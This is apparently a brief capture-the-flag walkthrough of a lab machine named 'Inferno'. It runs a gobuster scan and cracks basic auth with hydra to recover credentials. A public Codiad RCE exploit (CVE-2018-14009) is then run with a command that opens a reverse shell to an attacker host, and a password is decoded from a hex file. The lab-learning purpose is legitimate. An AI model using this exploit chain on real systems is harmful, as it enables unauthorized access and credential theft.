Inferno
// gobuster scan reveals /inferno directory
gobuster dir -u http://192.168.1.63/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x conf,inc,zip,gz
it's using basic auth, so decided to use hydra to brute force it
reveals the credentials admin / dante1
【CVE-2018-14009】 Codiad (2.8.4) RCE on Linux machine
https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit
had some issues with it being written in Python 2 but managed to run it in Python 3
note on usage:
python3 codiad.py http://admin:dante1@192.168.1.63/inferno/ admin dante1 192.168.1.131 4444 linux
view files in /home/dante
cat .download.dat
// convert the hex to reveal the message (which also contains the password for dante)
cat .download.dat | xxd -r -p && echo ''
dante:V1rg1l10h3lpm3